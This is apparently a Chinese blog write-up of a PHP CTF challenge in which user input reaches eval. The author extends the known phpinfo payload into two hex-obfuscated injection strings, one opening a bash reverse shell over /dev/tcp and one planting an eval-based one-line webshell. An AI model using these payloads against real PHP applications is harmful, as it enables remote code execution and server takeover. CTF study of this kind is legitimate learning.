dd.fun.php,[php4fun](challenge2)将只能执行phpinfo的漏洞转换为一句话木马

源码 :

$str=@(string)$_GET['str'];

eval('$str="'.addslashes($str).'";');

最开始百思不得其解 , 然后查阅了一些大佬们的 WriteUp

得到如下的 payload :

?str=${phpinfo()}

相关 php 官方文档可以参考 :

但是仍旧不太明白为什么这样就可以执行代码...

希望有知道的大佬可以教教我

本文的重点来了

笔者在根据网上大佬们提供的 Payload 的复现的时候发现

(原版的题目服务器已经挂掉了 , 所以笔者也不知道这个题最终的目标是啥...)

这个题目好像就是只让你执行一下 phpinfo 就行了

那么可不可以再猥琐一点执行一点别的呢

尝试一下直接这样行不行 :

?str={eval($_GET[c])}&c=phpinfo();

// 似乎并不行...

经过一番尝试 , 笔者最终发现了下面两种 Payload

// 一个反弹 shell 的 Payload

?str=${system(hex2bin(ff0a2f62696e2f62617368202d6320277368202d69203e26202f6465762f7463702f3132372e302e302e312f3434343420303e263127))}

// 一个一句话木马的 Payload

?str=${eval(substr(hex2bin(ff6576616c28245f524551554553545b635d293b),1,19))}&c=phpinfo();

dd72566ca4df

image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值